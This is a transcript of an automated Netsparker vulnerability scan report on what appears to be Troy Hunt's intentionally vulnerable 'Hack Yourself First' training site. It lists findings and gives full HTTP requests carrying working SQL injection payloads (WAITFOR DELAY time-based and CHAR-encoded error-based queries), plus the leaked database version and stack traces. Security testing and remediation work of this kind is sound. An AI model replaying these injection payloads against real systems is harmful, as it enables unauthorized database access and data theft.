Netsparker Scan Report - ASafaWeb
Transcript of Netsparker Scan Report - ASafaWeb
NETSPARKER SCAN REPORT SUMMARY
TARGET URL: http://hackyourselffirst.troyhunt.com/
SCAN DATE: 26/08/2014 8:57:41 AM
REPORT DATE: 28/08/2014 9:48:14 PM
SCAN DURATION: 00:41:12
Total Requests: 10019
Average Speed: 4.05 req/sec
41 identified
22 confirmed
10 critical
11 informational

SCAN SETTINGS / ENABLED ENGINES
SQL Injection, SQL Injection (Boolean), SQL Injection (Blind), Cross-site Scripting, Command Injection, Command Injection (Blind), Local File Inclusion, Remote File Inclusion, Remote Code Evaluation, HTTP Header Injection, Open Redirection, Expression Language Injection, Web App Fingerprint, RoR Code Execution, WebDAV
Authentication
Scheduled

VULNERABILITIES (share of the 41 identified)
CRITICAL: 24%
IMPORTANT: 12%
MEDIUM: 10%
LOW: 27%
INFORMATION: 27%
Page 1 of 57
VULNERABILITY SUMMARY
URL                   | Parameter   | Method      | Vulnerability                                                | Confirmed
/                     |             |             | Version Disclosure (ASP.NET)                                 | No
/                     |             |             | ASP.NET Identified                                           | No
/                     |             |             | Version Disclosure (IIS)                                     | No
/                     |             |             | Cross-site Scripting Protection Disabled                     | No
/Account/Login        |             |             | Cookie Not Marked as Secure                                  | Yes
/Account/Login        |             |             | Critical Form Served over HTTP                               | Yes
/Account/Login        |             |             | Cookie Not Marked as HttpOnly                                | Yes
/Account/Login        |             |             | [Possible] Cross-site Request Forgery in Login Form Detected | No
/Account/Login        |             |             | Autocomplete Enabled (Password Field)                        | Yes
/Account/Register     |             |             | Password Transmitted over HTTP                               | Yes
/Account/UserProfile  |             |             | [Possible] Cross-site Request Forgery Detected               | No
/Account/UserProfile  |             |             | [Possible] Internal Path Disclosure (*nix)                   | No
/api/admin            | nsextt      | GET         | [Possible] Cross-site Scripting                              | No
/api/admin            | Query Based | QueryString | [Possible] Cross-site Scripting                              | No
/api/admin/users      |             |             | E-mail Address Disclosure                                    | No
/api/vote             | comments    | POST        | Blind SQL Injection                                          | Yes
/api/vote             | comments    | POST        | SQL Injection                                                | Yes
/api/vote             | comments    | POST        | [Possible] Cross-site Scripting                              | No
/bundles              |             |             | Stack Trace Disclosure (ASP.NET)                             | No
/Images               |             |             | OPTIONS Method Enabled                                       | Yes
/Images/Makes         |             |             | Forbidden Resource                                           | Yes
/Make                 |             |             | Internal Server Error                                        | Yes
/Make/1               | orderby     | GET         | Blind SQL Injection                                          | Yes
/Make/1               | orderby     | GET         | SQL Injection                                                | Yes
/Make/1               |             |             | Out-of-date Version (Microsoft SQL Server)                   | No
/Make/1               |             |             | Database Error Message Disclosure                            | No
/Make/1               | orderby     | GET         | [Possible] SQL Injection                                     | No
/Make/1               |             |             | Database Detected (Microsoft SQL Server)                     | Yes
/Make/2               | orderby     | GET         | Blind SQL Injection                                          | Yes
/Make/2               | orderby     | GET         | SQL Injection                                                | Yes
/Make/2               | orderby     | GET         | [Possible] SQL Injection                                     | No
/Make/3               | orderby     | GET         | Blind SQL Injection                                          | Yes
/Make/3               | orderby     | GET         | SQL Injection                                                | Yes
/Make/3               | orderby     | GET         | [Possible] SQL Injection                                     | No
/robots.txt           |             |             | Robots.txt Detected                                          | Yes
/Search               | searchTerm  | GET         | Cross-site Scripting                                         | Yes
/Supercar/3           |             |             | Permanent Cross-site Scripting                               | Yes
/Supercar/3           |             |             | [Possible] Internal Path Disclosure (*nix)                   | No
/Supercar/3           |             |             | [Possible] Internal Path Disclosure (Windows)                | No
/Supercar/Leaderboard | orderBy     | GET         | Blind SQL Injection                                          | Yes
/Supercar/Leaderboard | orderBy     | GET         | SQL Injection                                                | Yes
CRITICAL: 5 total, 5 confirmed
1. Blind SQL Injection
Netsparker identified a blind SQL injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Netsparker confirmed the vulnerability by executing a test SQL query on the backend database. In these tests, SQL injection was not obvious, but the different responses from the page based on the injection test allowed us to identify and confirm the SQL injection.

Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database
- Executing commands on the underlying operating system

Actions to Take
1. See the remedy for solution.
2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
4. Use your web logs and application logs to see if there were any previous but undetected attacks to this resource.

Remedy
A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.

External References
OWASP SQL injection
SQL injection Cheat sheet

Remedy References
MSDN - Protect From SQL injection in ASP.NET

Classification
OWASP 2010-A1, OWASP 2013-A1, PCI v2.0-6.5.1, PCI v3.0-6.5.1, CWE-89, CAPEC-66, WASC-19
1.1 /Make/1  CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/1?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27--

Parameters
Parameter | Type | Value
orderby   | GET  | 1 WAITFOR DELAY '0:0:25'--

Request
GET /Make/1?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27-- HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:00:21 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 1811
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Nissans - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"> … (the normal page's navigation markup follows: links to /Supercar/Leaderboard, the /Account/LogOff form, https://hackyourselffirst.troyhunt.com/Account/ChangePassword and /Account/UserProfile; body truncated in the report)
1.2 /Supercar/Leaderboard  CONFIRMED
http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=1+WAITFOR+DELAY+%270%3a0%3a25%27-

Parameters
Parameter | Type | Value
orderBy   | GET  | 1 WAITFOR DELAY '0:0:25'--
asc       | GET  | false

Request
GET /Supercar/Leaderboard?orderBy=1+WAITFOR+DELAY+%270%3a0%3a25%27--&asc=false HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:16:09 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2885
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Supercar Leaderboard - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"> … (the normal page's navigation markup follows: links to /Supercar/Leaderboard, the /Account/LogOff form, https://hackyourselffirst.troyhunt.com/Account/ChangePassword and /Account/UserProfile; body truncated in the report)
1.3 /Make/3  CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/3?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27--

Parameters
Parameter | Type | Value
orderby   | GET  | 1 WAITFOR DELAY '0:0:25'--

Request
GET /Make/3?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27-- HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:06:47 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 1811
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Paganis - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"> … (the normal page's navigation markup follows: links to /Supercar/Leaderboard, the /Account/LogOff form, https://hackyourselffirst.troyhunt.com/Account/ChangePassword and /Account/UserProfile; body truncated in the report)
1.4 /Make/2  CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/2?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27--

Parameters
Parameter | Type | Value
orderby   | GET  | 1 WAITFOR DELAY '0:0:25'--

Request
GET /Make/2?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27-- HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:03:34 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 1811
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>McLarens - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"> … (the normal page's navigation markup follows: links to /Supercar/Leaderboard, the /Account/LogOff form, https://hackyourselffirst.troyhunt.com/Account/ChangePassword and /Account/UserProfile; body truncated in the report)
1.5 /api/vote  CONFIRMED
http://hackyourselffirst.troyhunt.com/api/vote

Parameters
Parameter  | Type | Value
userId     | POST | 1
supercarId | POST | 3
comments   | POST | ') WAITFOR DELAY '0:0:25'--

Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 68
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%27)+WAITFOR+DELAY+%270%3a0%3a25%27--

Response
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:21:22 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1

CRITICAL: 5 total, 5 confirmed
2. SQL Injection
Netsparker identified an SQL injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Netsparker confirmed the vulnerability by executing a test SQL query on the backend database.

Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following types of attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database
- Executing commands on the underlying operating system

Actions to Take
1. See the remedy for solution.
2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
4. Use your web logs and application logs to see if there were any previous but undetected attacks to this resource.

Remedy
A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.

External References
OWASP SQL injection
SQL injection Cheat sheet

Remedy References
MSDN - Protect From SQL injection in ASP.NET

Classification
OWASP 2010-A1, OWASP 2013-A1, PCI v2.0-6.5.1, PCI v3.0-6.5.1, CWE-89, CAPEC-66, WASC-19
2.1 /api/vote  CONFIRMED
http://hackyourselffirst.troyhunt.com/api/vote

Parameters
Parameter  | Type | Value
userId     | POST | 1
supercarId | POST | 3
comments   | POST | ' + (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+C

Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 \n\taug 20 2014 22:37:56 \n\tcopyright (c) microsoft corporation\n

Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 209
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%27%2b+(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns)+%2b%27

Response (headers truncated in the report)
…P.NET
Content-Length: 2867
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Conversion failed when converting the varchar value '_!@2dilemma' to data type int.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrap…
2.2 /Supercar/Leaderboard  CONFIRMED
http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=(select+convert(int%2cCHAR(95)%2b

Parameters
Parameter | Type | Value
orderBy   | GET  | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
asc       | GET  | false

Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>

Request
GET /Supercar/Leaderboard?orderBy=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns)&asc=false HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response (headers truncated in the report)
…30319
X-Powered-By: ASP.NET
Content-Length: 14292
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)   at System.Data.SqlClient.SqlInternalConnecti…
2.3 /Make/2  CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA

Parameters
Parameter | Type | Value
orderby   | GET  | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR

Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>

Request
GET /Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response (headers truncated in the report)
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)   at System.Data.SqlClient.SqlInternalConnecti…
2.4 /Make/3  CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA

Parameters
Parameter | Type | Value
orderby   | GET  | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR

Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>

Request
GET /Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response (headers truncated in the report)
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
